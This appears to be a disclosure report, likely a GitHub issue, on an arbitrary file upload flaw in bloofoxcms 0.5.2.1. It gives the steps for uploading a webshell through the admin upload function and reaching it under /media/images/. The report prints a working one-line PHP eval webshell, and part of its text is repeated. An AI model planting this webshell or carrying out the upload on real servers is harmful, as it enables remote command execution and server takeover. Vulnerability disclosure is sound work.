I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.
After entering the web management background, we can use the upload function to upload files:
We create a new webshell file and name it script.php :
<?php @eval($_GET[1]);
echo 'upload success';
?>
Click to select this file(script.php) :
Click upload file(s) and grab the data package:
First request package:
I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.

After entering the web management background, we can use the upload function to upload files:
We create a new webshell file and name it script.php :
Click to select this file(script.php) :


Click upload file(s) and grab the data package:
First request package:
First response package :
Then we follow 302 redirection,
Second request package :
Second response package :
We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php

Finally, we can access the webshell address and execute any command:

The text was updated successfully, but these errors were encountered: